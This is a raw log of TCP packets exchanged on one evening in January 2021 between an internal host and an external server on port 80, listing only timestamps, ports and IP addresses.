Jan 27, 2021 00:10:17.860378981 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860420942 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860460997 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860477924 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.860507011 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.860533953 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860622883 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860661030 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860685110 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.860763073 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860804081 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.860820055 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.860991955 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861036062 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861057997 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.861099005 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861140013 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861156940 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.861223936 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861283064 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.861306906 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861346960 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861408949 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861423016 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.861772060 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861814022 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:17.861835957 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:17.864970922 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.021503925 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021567106 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021614075 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021656036 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021704912 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021749020 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021787882 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021816015 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.021856070 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.021881104 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021920919 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.021954060 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.021980047 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022018909 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022053003 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.022172928 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022217035 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022238970 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.022351027 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022387981 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022411108 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.022448063 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022488117 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022527933 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022547007 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.022598982 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.022618055 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022664070 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022711039 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022730112 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.022770882 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022810936 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.022835970 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027220011 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027277946 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027323961 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027362108 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027386904 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027439117 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027477026 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027523041 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027532101 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027585030 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027631998 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027647018 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027666092 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027710915 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027751923 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027779102 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027817965 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027857065 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027875900 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.027921915 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027962923 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.027981997 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028032064 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028079987 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028100014 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028148890 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028191090 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028208971 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028249025 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028290987 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028310061 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028347969 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028387070 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028408051 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028445959 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028482914 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028506041 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028538942 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028578043 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028594971 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.028633118 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.028744936 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.184988022 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185046911 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185080051 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185117960 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185158968 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185201883 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185235023 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185247898 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185300112 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185343981 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185406923 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185476065 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185527086 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185576916 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185600042 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185651064 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185671091 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185719967 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185762882 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185794115 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185825109 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185866117 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185900927 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.185928106 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185966969 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.185995102 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.186026096 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.186065912 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.186100006 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.186126947 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.186165094 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.186192989 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.190856934 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.190974951 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.191057920 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191143036 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.191457033 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191500902 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191538095 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191576004 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.191601992 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191642046 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191679001 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.191710949 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191752911 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191781044 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.191823959 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.191903114 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.192105055 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.192147017 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.192184925 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.192223072 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.192244053 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.192322969 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.193372965 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.193459988 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.193548918 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.347966909 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348027945 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348067999 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348120928 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348135948 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348193884 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348216057 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348263979 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348309040 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348335981 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348371983 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348412037 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348443985 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348475933 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348517895 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348536015 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348637104 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348686934 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348718882 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348752022 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348778963 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348824978 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348867893 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.348891020 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.348927975 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.349001884 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.349071026 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.349118948 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.349199057 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.349210978 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.349251032 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.349318981 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.352374077 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352431059 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352474928 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352515936 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.352559090 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352608919 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352634907 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.352680922 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352725029 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352746964 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.352783918 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352823019 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352844954 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.352881908 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.352952957 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.352998972 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353040934 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353079081 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353105068 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353140116 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353179932 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353214025 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353244066 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353290081 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353334904 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353362083 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353431940 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353466988 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353513956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353564024 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353585005 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353640079 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353684902 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353709936 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353739977 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353775024 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353817940 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.353849888 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.353879929 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360025883 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360083103 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360125065 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360152006 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360198021 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360238075 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360259056 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360310078 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360352993 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360372066 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360413074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360454082 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360476017 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360526085 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360583067 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360595942 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360646009 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360691071 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360711098 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360749960 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360789061 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360816002 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360851049 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360892057 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360909939 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.360949993 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.360987902 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361007929 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361047983 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361088037 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361104965 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361146927 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361183882 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361203909 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361243010 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361283064 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361303091 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361344099 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361412048 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361429930 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361486912 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361526966 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361545086 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361593962 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361634970 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361651897 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361690998 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361730099 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361747980 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361795902 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361838102 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361856937 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361896992 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361938000 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.361955881 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.361994028 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.362031937 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.362049103 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.362096071 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.362147093 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.362709045 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.363656998 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.365309000 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.365355968 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.365432024 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.365499973 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.365586042 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.365653992 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.365756035 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.368928909 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.368997097 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.369052887 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.369163036 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.369216919 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.369229078 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.369271994 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.369311094 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.369328976 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.511744022 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.511804104 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.511845112 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.511883020 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.511921883 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.511950016 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.511962891 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512005091 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512031078 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512068987 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512108088 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512130976 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512178898 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512227058 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512259960 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512289047 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512314081 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512356997 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512383938 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512422085 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512440920 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512485981 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512531042 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512548923 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512770891 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512847900 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512856007 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512912035 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.512978077 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.512979031 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513056040 CET	80	49165	192.169.223.13	192.168.2.22
